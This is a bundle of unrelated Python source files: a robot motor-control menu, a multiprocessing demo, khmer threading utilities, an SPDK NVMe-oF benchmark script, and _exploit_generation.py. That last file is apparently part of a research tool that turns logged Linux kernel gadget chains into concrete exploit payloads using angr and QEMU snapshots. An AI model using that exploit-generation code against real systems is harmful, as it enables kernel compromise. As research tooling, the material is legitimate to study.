elif command[1] == ["move",100]:
motor_command = [["move",motor_id,100]]
motion_player(motor_command, sender_queue)
else:
pass
elif motor_id == 999:
if command[1] == ["up"]:
for i in range(legs):
motor_command = [["up",i]]
motion_player(motor_command, sender_queue)
elif command[1] == ["down"]:
for i in range(legs):
motor_command = [["down",i]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",0]:
for i in range(legs):
motor_command = [["move",i,0,1]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",100]:
for i in range(legs):
motor_command = [["move",i,100,1]]
motion_player(motor_command, sender_queue)
else:
pass
escape_mode = False
elif command[0] == "motor_id":
motor_id = command[1]
if motor_id in motor_id_mapping.keys():
logger.debug("motor_id is set as {}".format(motor_id_mapping[command[1]]))
elif motor_id == 999:
logger.debug("motor_id is set as all")
else:
logger.debug("motor_id is invalid")
motor_id = -1
escape_mode = False
elif command[0] == "command":
if command[1] == ["clear"]:
logger.debug("motor_id is cleared")
elif command[1] == ["stop"]:
logger.debug("reboot !!")
os.system("sudo reboot")
else:
pass
motor_id = -1
escape_mode = False
else:
escape_mode = False
logger.debug("************************************")
logger.debug(" end menu ")
logger.debug("************************************")
if __name__ == '__main__':
logger.debug("waiting for 10 sec")
time.sleep(10.0)
setup_serial_ports()
if len(arduino_ports) > 0:
arduino_available = True
legs = len(arduino_ports) * 2
if len(stm_ports) > 0:
stm_available = True
if arduino_available == False and stm_available == False:
logger.debug("No port is available")
exit()
for i in range(legs):
motor_height.append(1) # 0:float 1:ground
if legs < 6 and legs > 0:
try:
key_command_map[b'8'] = ["motor_id",id_motor_mapping['2']]
except:
key_command_map[b'8'] = ["motor_id",6]
try:
key_command_map[b'9'] = ["motor_id",id_motor_mapping['5']]
except:
key_command_map[b'9'] = ["motor_id",6]
try:
key_command_map[b'5'] = ["motor_id",id_motor_mapping['3']]
except:
key_command_map[b'5'] = ["motor_id",6]
try:
key_command_map[b'6'] = ["motor_id",id_motor_mapping['6']]
except:
key_command_map[b'6'] = ["motor_id",6]
try:
key_command_map[b'2'] = ["motor_id",id_motor_mapping['4']]
except:
key_command_map[b'2'] = ["motor_id",6]
try:
key_command_map[b'3'] = ["motor_id",id_motor_mapping['7']]
except:
key_command_map[b'3'] = ["motor_id",6]
# start threads
sender_queue = []
ts = []
rs = []
for i in range(len(arduino_ports)):
sender_queue.append(queue.Queue())
ser = arduino_ser[i]
ser.flush()
t = threading.Thread(target=sender,args=(sender_queue[i],ser,))
r = threading.Thread(target=reader,args=(ser,i,))
        t.daemon = True
        r.daemon = True
ts.append(t)
rs.append(r)
t.start()
r.start()
if stm_available:
for i in range(len(stm_ports)):
sender_queue.append(queue.Queue())
ser = stm_ser[i]
ser.flush()
t = threading.Thread(target=sender,args=(sender_queue[i+ len(arduino_ports)],ser,))
r = threading.Thread(target=reader,args=(ser,i + len(arduino_ports),))
            t.daemon = True
            r.daemon = True
ts.append(t)
rs.append(r)
t.start()
r.start()
time.sleep(2)
menu(sender_queue)
logger.debug("closing ports")
# stop sender queue
for _ in range(3):
for q in sender_queue:
q.put(None)
# stop serial ports and threads
for t in ts:
t.join()
if len(arduino_ser):
for ser in arduino_ser:
ser.close()
if stm_available:
if len(stm_ser):
for ser in stm_ser:
ser.close()
for r in rs:
r.join()
logger.debug("Done!!")
|
_exploit_generation.py
|
"""
filename: _exploit_generation.py
author: ww9210
This plugin reproduces the gadget chains discovered in the previous phase and generates the concrete payloads.
We do not generate concrete payloads during exploration because the required constraint solving consumes a lot of memory.
This file does not handle the details of payload generation; those implementations live in _payload_generation.py.
"""
from IPython import embed
import angr
from multiprocessing import Process
from os import listdir
from os.path import isfile, join
class ExploitGenererationMixin:
def parse_gadget_chain_log(self, gadget_chain_log):
"""
get gadget from the log file
:param gadget_chain_log:
:return:
"""
'''
self.disclosure_gadgets = pickle.load(open(disclosure_gadget_path, 'rb'))
self.fake_stack_gadgets = pickle.load(open(fake_stack_gadget_path, 'rb'))
self.smash_gadgets = pickle.load(open(smash_gadget_path, 'rb'))
self.bloom_gadgets = pickle.load(open(bloom_gadget_path, 'rb'))
self.fork_gadgets = pickle.load(open(fork_gadget_path, 'rb'))
'''
with open(gadget_chain_log,'r') as f:
log = f.readlines()
'''
blooming gadget:event_sched_out
forking gadget:em_call
prologue gadget:tg3_get_5720_nvram_info
disclosure gadget:mmc_ioctl_dvd_auth
smash gadget:fb_set_user_cmap
'''
bloom_gadget_name = log[0].split(':')[1].strip('\n')
forking_gadget_name = log[1].split(':')[1].strip('\n')
prologue_gadget_name = log[2].split(':')[1].strip('\n')
disclosure_gadget_name = log[3].split(':')[1].strip('\n')
smash_gadget_name = log[4].split(':')[1].strip('\n')
timestamp = int(log[5].strip('\n'), 16)
self.current_timestamp = timestamp
good_bloom_gadget_idx = -1
good_forking_gadget_idx = -1
good_prologue_disclosure_pair_idx = -1
good_smash_gadget_idx = -1
for i, bloom_gadget in enumerate(self.bloom_gadgets):
if bloom_gadget[1] == bloom_gadget_name:
good_bloom_gadget_idx = i
self.current_bloom_gadget_to_reproduce = bloom_gadget # set current bloom gadget to reproduce
break
if good_bloom_gadget_idx == -1:
assert 0 # wtf
# get forking
for i, forking_gadget in enumerate(self.fork_gadgets):
if forking_gadget[1] == forking_gadget_name:
good_forking_gadget_idx = i
self.current_forking_gadget_to_reproduce = forking_gadget # set current forking gadget to reproduce
break
if good_forking_gadget_idx == -1:
            print(forking_gadget_name, forking_gadget_name.encode().hex())
assert 0 # wtf
# get good prologue disclosure pair to reproduce from the log
self.current_prologue_disclosure_pair_to_reproduce = []
for i, prologue_disclosure_pair in enumerate(self.prologue_disclosure_pairs):
prologue_gadget = prologue_disclosure_pair[0]
disclosure_gadget = prologue_disclosure_pair[1]
if prologue_gadget[5] == prologue_gadget_name and disclosure_gadget[3] == disclosure_gadget_name:
good_prologue_disclosure_pair_idx = i
self.current_prologue_disclosure_pair_to_reproduce.append(prologue_disclosure_pair)
if good_prologue_disclosure_pair_idx == -1:
assert 0
# get current smash gadget to reproduce
self.current_smash_gadget_to_reproduce = []
for i, smash_gadget in enumerate(self.smash_gadgets):
if smash_gadget[3] == smash_gadget_name:
good_smash_gadget_idx = i
self.current_smash_gadget_to_reproduce.append(smash_gadget) # set current smash gadget to reproduce
if good_smash_gadget_idx == -1:
assert 0 # wtf
return
def update_gadget_candidate_list(self):
"""
replace gadget candidate list
:return:
"""
self.bloom_gadgets = []
self.fork_gadgets = []
self.prologue_disclosure_pairs = []
self.smash_gadgets = []
        # put the gadget chain to reproduce into the candidate list
self.bloom_gadgets.append(self.current_bloom_gadget_to_reproduce)
self.fork_gadgets.append(self.current_forking_gadget_to_reproduce)
for pair in self.current_prologue_disclosure_pair_to_reproduce:
self.prologue_disclosure_pairs.append(pair)
for smash_gadget in self.current_smash_gadget_to_reproduce:
self.smash_gadgets.append(smash_gadget)
return
def update_generated_payload_number(self):
"""
        update the number of already generated payloads so we won't overwrite them
:return:
"""
payload_path = self.payload_path
mypath = payload_path
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
f_cnt = 0
for fn in onlyfiles:
if 'info_' in fn:
f_cnt += 1
self.num_of_generate_payload = f_cnt
def reproduce_an_exploit(self, gadget_chain_log_filename=None, debug_dfs=False):
if gadget_chain_log_filename is None:
return
# get gadget chain to reproduce from log
self.parse_gadget_chain_log(gadget_chain_log_filename)
# replace gadget list to test
self.update_gadget_candidate_list()
# set several global variables
self.current_log_to_reproduce = gadget_chain_log_filename
self.is_dfs_search_routine = True
self.debug_dfs = debug_dfs
self.reproduce_mode = True
# start reproducing
self._bloom(start_bloom_idx=0)
return
def reproduce_all_log_in_a_dir(self, number_to_reproduce=None, use_subprocess=True, gadget_chain_log_dir=None):
"""
:param gadget_chain_log_dir: path of generated logs to reproduce
:return:
"""
# firstly update the total number of payloads we already reproduced
# respect the flow of osok_dfs, but not necessary here
self.prologue_disclosure_pairs = self.get_prologue_disclosure_pairs()
# load qemu snapshot
self.load_hyper_parameters()
self.load_qemu_snapshot()
self.initial_state = self.get_initial_state(control_memory_base=self.controlled_memory_base)
if gadget_chain_log_dir is None:
return
mypath = gadget_chain_log_dir
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
files_with_full_path = [join(mypath, f) for f in listdir(mypath)]
for fn in files_with_full_path:
self.update_generated_payload_number()
if 'info_' in fn:
print('[+] generating exploit for', fn)
if use_subprocess:
p = Process(target=self.reproduce_an_exploit, args=(fn, False))
p.start()
p.join()
else:
self.reproduce_an_exploit(fn, False)
return
|
demo09.py
|
# -*- coding: utf-8 -*-
from multiprocessing import Process, freeze_support
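# freeze_support() is needed when a multiprocessing program is frozen into a
# Windows executable (e.g. with PyInstaller); on other platforms it is a no-op.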
def f():
print('hello world')
if __name__ == '__main__':
freeze_support()
Process(target=f).start()
|
thread_utils.py
|
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2011-2015, Michigan State University.
# Copyright (C) 2015-2016, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: khmer-project@idyll.org
# pylint: disable=missing-docstring,too-few-public-methods
"""Utilities for dealing with multithreaded processing of short reads."""
import threading
import sys
import screed
import khmer
from khmer.utils import write_record, check_is_pair
from khmer.khmer_logger import log_info
# stdlib queue module was renamed on Python 3
try:
import queue
except ImportError:
import Queue as queue
DEFAULT_WORKER_THREADS = 8
DEFAULT_GROUPSIZE = 100
def verbose_loader(filename):
"""Read iterator that additionally prints progress info to stderr."""
for num, record in enumerate(khmer.ReadParser(filename)):
if num % 100000 == 0:
log_info('... filtering {num}', num=num)
yield record
verbose_fasta_iter = verbose_loader # pylint: disable=invalid-name
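# Illustrative usage sketch (not part of this module): ThreadedSequenceProcessor
# takes a per-record callable returning (name, sequence) -- or (None, None) to
# drop the read -- and streams records through a pool of worker threads. The
# filenames and the length cutoff below are hypothetical.
#
#     def keep_long(record):
#         seq = record.sequence
#         return (record.name, seq) if len(seq) >= 50 else (None, None)
#
#     tsp = ThreadedSequenceProcessor(keep_long)
#     tsp.start(verbose_loader('reads.fa'), open('filtered.fa', 'w'))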
class SequenceGroup(object):
def __init__(self, order, seqlist):
self.order = order
self.seqlist = seqlist
class ThreadedSequenceProcessor(object):
# pylint: disable=too-many-instance-attributes
QUEUESIZE = 50
def __init__(self, process_fn, n_workers=DEFAULT_WORKER_THREADS,
group_size=DEFAULT_GROUPSIZE, verbose=True):
self.process_fn = process_fn
self.n_workers = n_workers
self.group_size = group_size
self.inqueue = queue.Queue(self.QUEUESIZE)
self.outqueue = queue.Queue(self.QUEUESIZE)
self.worker_count = 0
self.worker_count_lock = threading.Lock()
self.done = False
self.verbose = verbose
self.n_processed = 0
self.n_written = 0
self.bp_processed = 0
self.bp_written = 0
self.tallies_lock = threading.Lock()
def start(self, inputiter, outfp):
if self.verbose:
print('starting threads', file=sys.stderr)
try:
for _ in range(self.n_workers):
thread = threading.Thread(target=self.do_process)
self.worker_count += 1
thread.start()
if self.verbose:
print('starting writer', file=sys.stderr)
writer = threading.Thread(target=self.do_write, args=(outfp,))
writer.start()
if self.verbose:
print('loading...', file=sys.stderr)
self.push_sequences(inputiter)
if self.verbose:
print('done loading in sequences', file=sys.stderr)
self.done = True
writer.join()
except Exception:
self.done = True
raise
def push_sequences(self, inputiter):
batch = []
last_record = None
i = 0
for record in inputiter:
if i >= self.group_size:
# keep pairs together in batches, to retain the interleaving.
if check_is_pair(last_record, record):
batch.append(record)
grouping = SequenceGroup(0, batch)
self.inqueue.put(grouping)
batch = []
else:
grouping = SequenceGroup(0, batch)
self.inqueue.put(grouping)
batch = [record]
i = 0
else:
batch.append(record)
last_record = record
i += 1
# submit last set of sequences
if batch:
grouping = SequenceGroup(0, batch)
self.inqueue.put(grouping)
def do_process(self):
inq = self.inqueue
while not self.done or not inq.empty():
try:
grouping = inq.get(True, 1)
except queue.Empty:
continue
bp_processed = 0
bp_written = 0
keep = []
for record in grouping.seqlist:
name, sequence = self.process_fn(record)
bp_processed += len(record.sequence)
if name:
quality = None
if hasattr(record, 'quality'):
quality = record.quality[:len(sequence)]
bp_written += len(sequence)
keep.append((name, sequence, quality))
self.outqueue.put(SequenceGroup(0, keep))
# the tallies are shared among workers, hence we lock
with self.tallies_lock:
self.n_processed += len(grouping.seqlist)
self.n_written += len(keep)
self.bp_processed += bp_processed
self.bp_written += bp_written
if self.verbose and self.n_processed % 500000 == 0:
print("processed %d / wrote %d / removed %d" %
(self.n_processed, self.n_written,
self.n_processed - self.n_written), file=sys.stderr)
print("processed %d bp / wrote %d bp / removed %d bp" %
(self.bp_processed, self.bp_written,
self.bp_processed - self.bp_written),
file=sys.stderr)
discarded = self.bp_processed - self.bp_written
percent = float(discarded) / float(self.bp_processed) * 100
print("discarded %.1f%%" % percent, file=sys.stderr)
# end of thread; exit, decrement worker count.
with self.worker_count_lock:
self.worker_count -= 1
def do_write(self, outfp):
outq = self.outqueue
while self.worker_count > 0 or not outq.empty():
try:
grouping = outq.get(True, 1)
except queue.Empty:
continue
for name, seq, qual in grouping.seqlist:
if qual:
record = screed.Record(name=name, sequence=seq,
quality=qual)
else:
record = screed.Record(name=name, sequence=seq)
write_record(record, outfp)
if self.verbose:
print("DONE writing.\nprocessed %d / wrote %d / removed %d" %
(self.n_processed, self.n_written,
self.n_processed - self.n_written), file=sys.stderr)
print("processed %d bp / wrote %d bp / removed %d bp" %
(self.bp_processed, self.bp_written,
self.bp_processed - self.bp_written), file=sys.stderr)
discarded = self.bp_processed - self.bp_written
percent = float(discarded) / float(self.bp_processed) * 100
print("discarded %.1f%%" % percent, file=sys.stderr)
# vim: set filetype=python tabstop=4 softtabstop=4 shiftwidth=4 expandtab:
# vim: set textwidth=79:
|
run_nvmf.py
|
#!/usr/bin/env python3
from json.decoder import JSONDecodeError
import os
import re
import sys
import argparse
import json
import zipfile
import threading
import subprocess
import itertools
import configparser
import time
import uuid
from collections import OrderedDict
import paramiko
import pandas as pd
import rpc
import rpc.client
from common import *
class Server:
def __init__(self, name, general_config, server_config):
self.name = name
self.username = general_config["username"]
self.password = general_config["password"]
self.transport = general_config["transport"].lower()
self.nic_ips = server_config["nic_ips"]
self.mode = server_config["mode"]
self.irq_scripts_dir = "/usr/src/local/mlnx-tools/ofed_scripts"
if "irq_scripts_dir" in server_config and server_config["irq_scripts_dir"]:
self.irq_scripts_dir = server_config["irq_scripts_dir"]
self.local_nic_info = []
self._nics_json_obj = {}
self.svc_restore_dict = {}
self.sysctl_restore_dict = {}
self.tuned_restore_dict = {}
self.governor_restore = ""
self.tuned_profile = ""
self.enable_adq = False
self.adq_priority = None
if "adq_enable" in server_config and server_config["adq_enable"]:
self.enable_adq = server_config["adq_enable"]
self.adq_priority = 1
if "tuned_profile" in server_config:
self.tuned_profile = server_config["tuned_profile"]
if not re.match("^[A-Za-z0-9]*$", name):
self.log_print("Please use a name which contains only letters or numbers")
sys.exit(1)
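    # Example of the configuration fragments this class consumes (illustrative
    # only; the field names follow the lookups above, the values are made up):
    #
    #   general_config = {"username": "user", "password": "secret",
    #                     "transport": "tcp"}
    #   server_config = {"nic_ips": ["192.0.2.1"], "mode": "spdk",
    #                    "adq_enable": False, "tuned_profile": "latency-performance"}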
def log_print(self, msg):
print("[%s] %s" % (self.name, msg), flush=True)
def get_uncommented_lines(self, lines):
return [line for line in lines if line and not line.startswith('#')]
def get_nic_name_by_ip(self, ip):
if not self._nics_json_obj:
nics_json_obj = self.exec_cmd(["ip", "-j", "address", "show"])
self._nics_json_obj = list(filter(lambda x: x["addr_info"], json.loads(nics_json_obj)))
for nic in self._nics_json_obj:
for addr in nic["addr_info"]:
if ip in addr["local"]:
return nic["ifname"]
def set_local_nic_info_helper(self):
pass
def set_local_nic_info(self, pci_info):
def extract_network_elements(json_obj):
nic_list = []
if isinstance(json_obj, list):
for x in json_obj:
nic_list.extend(extract_network_elements(x))
elif isinstance(json_obj, dict):
if "children" in json_obj:
nic_list.extend(extract_network_elements(json_obj["children"]))
if "class" in json_obj.keys() and "network" in json_obj["class"]:
nic_list.append(json_obj)
return nic_list
self.local_nic_info = extract_network_elements(pci_info)
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
return ""
def configure_system(self):
self.configure_services()
self.configure_sysctl()
self.configure_tuned()
self.configure_cpu_governor()
self.configure_irq_affinity()
def configure_adq(self):
if self.mode == "kernel":
self.log_print("WARNING: ADQ setup not yet supported for Kernel mode. Skipping configuration.")
return
self.adq_load_modules()
self.adq_configure_nic()
def adq_load_modules(self):
self.log_print("Modprobing ADQ-related Linux modules...")
adq_module_deps = ["sch_mqprio", "act_mirred", "cls_flower"]
for module in adq_module_deps:
try:
self.exec_cmd(["sudo", "modprobe", module])
self.log_print("%s loaded!" % module)
except CalledProcessError as e:
self.log_print("ERROR: failed to load module %s" % module)
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
def adq_configure_tc(self):
self.log_print("Configuring ADQ Traffic classess and filters...")
if self.mode == "kernel":
self.log_print("WARNING: ADQ setup not yet supported for Kernel mode. Skipping configuration.")
return
num_queues_tc0 = 2 # 2 is minimum number of queues for TC0
num_queues_tc1 = self.num_cores
port_param = "dst_port" if isinstance(self, Target) else "src_port"
ports = set([p[0] for p in self.subsystem_info_list])
xps_script_path = os.path.join(self.spdk_dir, "scripts", "perf", "nvmf", "set_xps_rxqs")
for nic_ip in self.nic_ips:
nic_name = self.get_nic_name_by_ip(nic_ip)
tc_qdisc_map_cmd = ["sudo", "tc", "qdisc", "add", "dev", nic_name,
"root", "mqprio", "num_tc", "2", "map", "0", "1",
"queues", "%s@0" % num_queues_tc0,
"%s@%s" % (num_queues_tc1, num_queues_tc0),
"hw", "1", "mode", "channel"]
self.log_print(" ".join(tc_qdisc_map_cmd))
self.exec_cmd(tc_qdisc_map_cmd)
tc_qdisc_ingress_cmd = ["sudo", "tc", "qdisc", "add", "dev", nic_name, "ingress"]
self.log_print(" ".join(tc_qdisc_ingress_cmd))
self.exec_cmd(tc_qdisc_ingress_cmd)
for port in ports:
tc_filter_cmd = ["sudo", "tc", "filter", "add", "dev", nic_name,
"protocol", "ip", "ingress", "prio", "1", "flower",
"dst_ip", "%s/32" % nic_ip, "ip_proto", "tcp", port_param, port,
"skip_sw", "hw_tc", "1"]
self.log_print(" ".join(tc_filter_cmd))
self.exec_cmd(tc_filter_cmd)
            # Ethtool coalesce settings must be applied after configuring traffic classes
self.exec_cmd(["sudo", "ethtool", "--coalesce", nic_name, "adaptive-rx", "off", "rx-usecs", "0"])
self.exec_cmd(["sudo", "ethtool", "--coalesce", nic_name, "adaptive-tx", "off", "tx-usecs", "500"])
self.log_print("Running set_xps_rxqs script for %s NIC..." % nic_name)
xps_cmd = ["sudo", xps_script_path, nic_name]
self.log_print(xps_cmd)
self.exec_cmd(xps_cmd)
def adq_configure_nic(self):
self.log_print("Configuring NIC port settings for ADQ testing...")
# Reload the driver first, to make sure any previous settings are re-set.
try:
self.exec_cmd(["sudo", "rmmod", "ice"])
self.exec_cmd(["sudo", "modprobe", "ice"])
except CalledProcessError as e:
self.log_print("ERROR: failed to reload ice module!")
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
nic_names = [self.get_nic_name_by_ip(n) for n in self.nic_ips]
for nic in nic_names:
self.log_print(nic)
try:
self.exec_cmd(["sudo", "ethtool", "-K", nic,
"hw-tc-offload", "on"]) # Enable hardware TC offload
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic,
"channel-inline-flow-director", "on"]) # Enable Intel Flow Director
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic, "fw-lldp-agent", "off"]) # Disable LLDP
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic,
"channel-pkt-inspect-optimize", "off"]) # Disable channel packet inspection optimization
except CalledProcessError as e:
self.log_print("ERROR: failed to configure NIC port using ethtool!")
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
self.log_print("Please update your NIC driver and firmware versions and try again.")
self.log_print(self.exec_cmd(["sudo", "ethtool", "-k", nic]))
self.log_print(self.exec_cmd(["sudo", "ethtool", "--show-priv-flags", nic]))
def configure_services(self):
self.log_print("Configuring active services...")
svc_config = configparser.ConfigParser(strict=False)
# Below list is valid only for RHEL / Fedora systems and might not
# contain valid names for other distributions.
svc_target_state = {
"firewalld": "inactive",
"irqbalance": "inactive",
"lldpad.service": "inactive",
"lldpad.socket": "inactive"
}
for service in svc_target_state:
out = self.exec_cmd(["sudo", "systemctl", "show", "--no-page", service])
out = "\n".join(["[%s]" % service, out])
svc_config.read_string(out)
if "LoadError" in svc_config[service] and "not found" in svc_config[service]["LoadError"]:
continue
service_state = svc_config[service]["ActiveState"]
self.log_print("Current state of %s service is %s" % (service, service_state))
self.svc_restore_dict.update({service: service_state})
if service_state != "inactive":
self.log_print("Disabling %s. It will be restored after the test has finished." % service)
self.exec_cmd(["sudo", "systemctl", "stop", service])
def configure_sysctl(self):
self.log_print("Tuning sysctl settings...")
busy_read = 0
if self.enable_adq and self.mode == "spdk":
busy_read = 1
sysctl_opts = {
"net.core.busy_poll": 0,
"net.core.busy_read": busy_read,
"net.core.somaxconn": 4096,
"net.core.netdev_max_backlog": 8192,
"net.ipv4.tcp_max_syn_backlog": 16384,
"net.core.rmem_max": 268435456,
"net.core.wmem_max": 268435456,
"net.ipv4.tcp_mem": "268435456 268435456 268435456",
"net.ipv4.tcp_rmem": "8192 1048576 33554432",
"net.ipv4.tcp_wmem": "8192 1048576 33554432",
"net.ipv4.route.flush": 1,
"vm.overcommit_memory": 1,
}
for opt, value in sysctl_opts.items():
self.sysctl_restore_dict.update({opt: self.exec_cmd(["sysctl", "-n", opt]).strip()})
self.log_print(self.exec_cmd(["sudo", "sysctl", "-w", "%s=%s" % (opt, value)]).strip())
def configure_tuned(self):
if not self.tuned_profile:
self.log_print("WARNING: Tuned profile not set in configration file. Skipping configuration.")
return
self.log_print("Configuring tuned-adm profile to %s." % self.tuned_profile)
service = "tuned"
tuned_config = configparser.ConfigParser(strict=False)
out = self.exec_cmd(["sudo", "systemctl", "show", "--no-page", service])
out = "\n".join(["[%s]" % service, out])
tuned_config.read_string(out)
tuned_state = tuned_config[service]["ActiveState"]
self.svc_restore_dict.update({service: tuned_state})
if tuned_state != "inactive":
profile = self.exec_cmd(["cat", "/etc/tuned/active_profile"]).strip()
profile_mode = self.exec_cmd(["cat", "/etc/tuned/profile_mode"]).strip()
self.tuned_restore_dict = {
"profile": profile,
"mode": profile_mode
}
self.exec_cmd(["sudo", "systemctl", "start", service])
self.exec_cmd(["sudo", "tuned-adm", "profile", self.tuned_profile])
self.log_print("Tuned profile set to %s." % self.exec_cmd(["cat", "/etc/tuned/active_profile"]))
def configure_cpu_governor(self):
self.log_print("Setting CPU governor to performance...")
# This assumes that there is the same CPU scaling governor on each CPU
self.governor_restore = self.exec_cmd(["cat", "/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor"]).strip()
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", "performance"])
def configure_irq_affinity(self):
self.log_print("Setting NIC irq affinity for NICs...")
irq_script_path = os.path.join(self.irq_scripts_dir, "set_irq_affinity.sh")
nic_names = [self.get_nic_name_by_ip(n) for n in self.nic_ips]
for nic in nic_names:
irq_cmd = ["sudo", irq_script_path, nic]
self.log_print(irq_cmd)
self.exec_cmd(irq_cmd, change_dir=self.irq_scripts_dir)
def restore_services(self):
self.log_print("Restoring services...")
for service, state in self.svc_restore_dict.items():
cmd = "stop" if state == "inactive" else "start"
self.exec_cmd(["sudo", "systemctl", cmd, service])
def restore_sysctl(self):
self.log_print("Restoring sysctl settings...")
for opt, value in self.sysctl_restore_dict.items():
self.log_print(self.exec_cmd(["sudo", "sysctl", "-w", "%s=%s" % (opt, value)]).strip())
def restore_tuned(self):
self.log_print("Restoring tuned-adm settings...")
if not self.tuned_restore_dict:
return
if self.tuned_restore_dict["mode"] == "auto":
self.exec_cmd(["sudo", "tuned-adm", "auto_profile"])
self.log_print("Reverted tuned-adm to auto_profile.")
else:
self.exec_cmd(["sudo", "tuned-adm", "profile", self.tuned_restore_dict["profile"]])
self.log_print("Reverted tuned-adm to %s profile." % self.tuned_restore_dict["profile"])
def restore_governor(self):
self.log_print("Restoring CPU governor setting...")
if self.governor_restore:
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", self.governor_restore])
self.log_print("Reverted CPU governor to %s." % self.governor_restore)
class Target(Server):
def __init__(self, name, general_config, target_config):
super(Target, self).__init__(name, general_config, target_config)
# Defaults
self.enable_sar = False
self.sar_delay = 0
self.sar_interval = 0
self.sar_count = 0
self.enable_pcm = False
self.pcm_dir = ""
self.pcm_delay = 0
self.pcm_interval = 0
self.pcm_count = 0
self.enable_bandwidth = 0
self.bandwidth_count = 0
self.enable_dpdk_memory = False
self.dpdk_wait_time = 0
self.enable_zcopy = False
self.scheduler_name = "static"
self.null_block = 0
self._nics_json_obj = json.loads(self.exec_cmd(["ip", "-j", "address", "show"]))
self.subsystem_info_list = []
if "null_block_devices" in target_config:
self.null_block = target_config["null_block_devices"]
if "sar_settings" in target_config:
self.enable_sar, self.sar_delay, self.sar_interval, self.sar_count = target_config["sar_settings"]
if "pcm_settings" in target_config:
self.enable_pcm = True
self.pcm_dir, self.pcm_delay, self.pcm_interval, self.pcm_count = target_config["pcm_settings"]
if "enable_bandwidth" in target_config:
self.enable_bandwidth, self.bandwidth_count = target_config["enable_bandwidth"]
if "enable_dpdk_memory" in target_config:
self.enable_dpdk_memory, self.dpdk_wait_time = target_config["enable_dpdk_memory"]
if "scheduler_settings" in target_config:
self.scheduler_name = target_config["scheduler_settings"]
if "zcopy_settings" in target_config:
self.enable_zcopy = target_config["zcopy_settings"]
if "results_dir" in target_config:
self.results_dir = target_config["results_dir"]
self.script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
self.spdk_dir = os.path.abspath(os.path.join(self.script_dir, "../../../"))
self.set_local_nic_info(self.set_local_nic_info_helper())
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.zip_spdk_sources(self.spdk_dir, "/tmp/spdk.zip")
self.configure_system()
if self.enable_adq:
self.configure_adq()
self.sys_config()
def set_local_nic_info_helper(self):
return json.loads(self.exec_cmd(["lshw", "-json"]))
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
stderr_opt = None
if stderr_redirect:
stderr_opt = subprocess.STDOUT
if change_dir:
old_cwd = os.getcwd()
os.chdir(change_dir)
self.log_print("Changing directory to %s" % change_dir)
out = check_output(cmd, stderr=stderr_opt).decode(encoding="utf-8")
if change_dir:
os.chdir(old_cwd)
self.log_print("Changing directory to %s" % old_cwd)
return out
def zip_spdk_sources(self, spdk_dir, dest_file):
self.log_print("Zipping SPDK source directory")
fh = zipfile.ZipFile(dest_file, "w", zipfile.ZIP_DEFLATED)
for root, directories, files in os.walk(spdk_dir, followlinks=True):
for file in files:
fh.write(os.path.relpath(os.path.join(root, file)))
fh.close()
self.log_print("Done zipping")
def read_json_stats(self, file):
with open(file, "r") as json_data:
data = json.load(json_data)
            job_pos = 0  # job_pos = 0 because we are using aggregated results
# Check if latency is in nano or microseconds to choose correct dict key
def get_lat_unit(key_prefix, dict_section):
# key prefix - lat, clat or slat.
# dict section - portion of json containing latency bucket in question
# Return dict key to access the bucket and unit as string
for k, _ in dict_section.items():
if k.startswith(key_prefix):
return k, k.split("_")[1]
def get_clat_percentiles(clat_dict_leaf):
if "percentile" in clat_dict_leaf:
p99_lat = float(clat_dict_leaf["percentile"]["99.000000"])
p99_9_lat = float(clat_dict_leaf["percentile"]["99.900000"])
p99_99_lat = float(clat_dict_leaf["percentile"]["99.990000"])
p99_999_lat = float(clat_dict_leaf["percentile"]["99.999000"])
return [p99_lat, p99_9_lat, p99_99_lat, p99_999_lat]
else:
# Latest fio versions do not provide "percentile" results if no
# measurements were done, so just return zeroes
return [0, 0, 0, 0]
read_iops = float(data["jobs"][job_pos]["read"]["iops"])
read_bw = float(data["jobs"][job_pos]["read"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["read"])
read_avg_lat = float(data["jobs"][job_pos]["read"][lat_key]["mean"])
read_min_lat = float(data["jobs"][job_pos]["read"][lat_key]["min"])
